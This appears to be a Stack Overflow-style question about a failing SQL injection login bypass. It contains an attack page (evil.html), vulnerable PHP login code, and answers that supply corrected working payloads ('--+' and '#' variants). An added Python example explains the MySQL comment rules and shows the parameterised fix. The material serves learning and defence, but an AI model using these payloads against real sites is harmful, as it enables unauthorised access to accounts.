
Background

I've made an HTML page, evil.html, where the user can enter a username and click a submit button, thereby logging them into the site that I created.

I would expect that the injection `'or 1=1 --` would mean that if I submit a user with username test, the SQL query becomes

SELECT * FROM users WHERE userid='test' or 1=1 -- AND password='$hash'

which should mean that my user test is authenticated. However, it is throwing a 500, and there are + signs where the spaces in the injection are.

My login parameter in the request looks like this:

login: "test'or+1=1+--"

Does anyone have any idea why this exploit is not working?

evil.html

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<script>
  // Runs on submit: append the injection to whatever the user typed in the
  // login field, so the POST body carries "<username>'or 1=1 --".
  function attack() {
    document.querySelector('#login').value += "'or 1=1 --";
  }
</script>
</head>
<body>
<form action="http://example.com/" onsubmit="attack();" method="POST">
  <input name="login" id="login" value="">
  <button>Submit</button>
</form>
</body>
</html>

login.php

function login($username, $password) {
    // $username is interpolated straight into the query: this is the injection point.
    $sql = "SELECT * FROM users WHERE userid='$username'";
    $result = $this->db->query($sql);
    $user = $result->next();
    if (!$user) {
        return false;
    }
    $salt = $user['salt'];
    $hash = md5($salt.$password);
    // Same interpolation again; the injected comment is meant to cut off the password check.
    $sql = "SELECT * FROM users WHERE userid='$username' AND password='$hash'";
    $userdata = $this->db->query($sql)->next();
    if ($userdata) {
        // user is logged in
        // doStuff()
    }
}
  • What is the error text? – u_mulder Jul 12 '20 at 19:18
  • @u_mulder Upon further inspection, it looks like the `'` in the injection `' or 1=1 --` is causing the error, though I'm not sure why. As for the error text, it just says `500 Internal Server Error`; there's no response body coming back. – MichaelOMi3l Jul 12 '20 at 19:27
  • Check the server log for details on what is causing the 500 error. – Dave Jul 12 '20 at 20:06

2 Answers


Try adding a space after the double hyphen.

So, from

.value += "'or 1=1 --"; to .value += "'or 1=1 -- ";

Gavin

The plus is the URL-encoded form of a space. So it's perfectly fine at this point (cf. URL encoding the space character: + or %20?).

In the widely used relational database management systems from Microsoft, Oracle, PostgreSQL and MySQL, a comment can be introduced with --. MySQL is a bit fussy here: it would like to have a space after the --, otherwise it won't recognize it.

So a valid exploit should be:

"test'or+1=1+--+"

You can also try another mySQL notation like '#comment'

"test'or+1=1+#"

Cf. the section "Comments" in https://portswigger.net/web-security/sql-injection/cheat-sheet.

secf00tprint
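The following is an added example, not code from the question or either answer. It reproduces offline what both answers describe: the form body is URL-decoded as PHP does it (so `+` becomes a space), the decoded value is interpolated into the second query from login.php, and a small scanner applies MySQL's rule that `--` only starts a comment when followed by whitespace (and that `#` always does). For the original payload the comment never takes, the `'` from the injection opens a string literal that swallows the rest of the line, and the final quote is left unterminated, which is the syntax error behind the 500. The fix at the end binds the username as a parameter; it uses an in-memory SQLite table purely to show binding (SQLite's comment rules differ from MySQL's, so it is not used for the comment check). The hash value, the table contents and the three payloads are constructed test data.

```python
"""
Added example: why "test'or+1=1+--" fails against MySQL but "test'or+1=1+--+" and
"test'or+1=1+#" do not, plus the parameterised version of the lookup.
"""
import sqlite3
from urllib.parse import parse_qs

# Second query from the page's login.php, with its two interpolation points.
QUERY_TEMPLATE = "SELECT * FROM users WHERE userid='{username}' AND password='{hash}'"
FAKE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # constructed stand-in for md5($salt.$password)


def decode_login(form_body: str) -> str:
    """Decode an application/x-www-form-urlencoded body the way PHP fills $_POST: '+' is a space."""
    return parse_qs(form_body, keep_blank_values=True)["login"][0]


def build_query(username: str, password_hash: str = FAKE_HASH) -> str:
    """Mimic login.php: raw string interpolation, no escaping, no parameters."""
    return QUERY_TEMPLATE.format(username=username, hash=password_hash)


def strip_mysql_comments(sql: str) -> str:
    """
    Return the part of the statement MySQL would actually parse.
      * '#'  starts a comment that runs to end of line;
      * '--' starts a comment only when followed by whitespace or end of string.
    Single-quoted literals are skipped so markers inside strings are ignored;
    an unterminated literal is reported the way MySQL would: as a syntax error.
    """
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "'":
            j = i + 1
            while j < n:
                if sql[j] == "'":
                    if j + 1 < n and sql[j + 1] == "'":  # '' escapes a quote inside a literal
                        j += 2
                        continue
                    break
                j += 1
            if j >= n:
                raise ValueError("unterminated string literal")
            i = j + 1
            continue
        if c == "#":
            return sql[:i]
        if sql.startswith("--", i) and (i + 2 == n or sql[i + 2].isspace()):
            return sql[:i]
        i += 1
    return sql


def effective_query(form_body: str) -> str:
    """Decode, interpolate and comment-strip; return the live SQL or the error MySQL would raise."""
    try:
        return strip_mysql_comments(build_query(decode_login(form_body)))
    except ValueError as exc:
        return f"ERROR: {exc}"


def lookup_user_safely(username: str):
    """
    The fix: bind the username instead of interpolating it. In-memory SQLite with
    constructed rows is used only to demonstrate binding; the injected text is
    compared as data, so no comment trick can truncate the statement.
    """
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (userid TEXT, salt TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('test', 'abc', ?)", (FAKE_HASH,))
    row = con.execute("SELECT userid FROM users WHERE userid=?", (username,)).fetchone()
    con.close()
    return row[0] if row else None


if __name__ == "__main__":
    for body in ("login=test'or+1=1+--", "login=test'or+1=1+--+", "login=test'or+1=1+#"):
        print(f"{body:<24} -> {effective_query(body)}")
    print("parameterised lookup with payload:", lookup_user_safely("test'or 1=1 -- "))
```

Run it as a script to see the three outcomes side by side: the first body ends in a syntax error, the other two leave `... WHERE userid='test'or 1=1 ` as the executed statement with the password check gone, and the bound query returns no row for the payload.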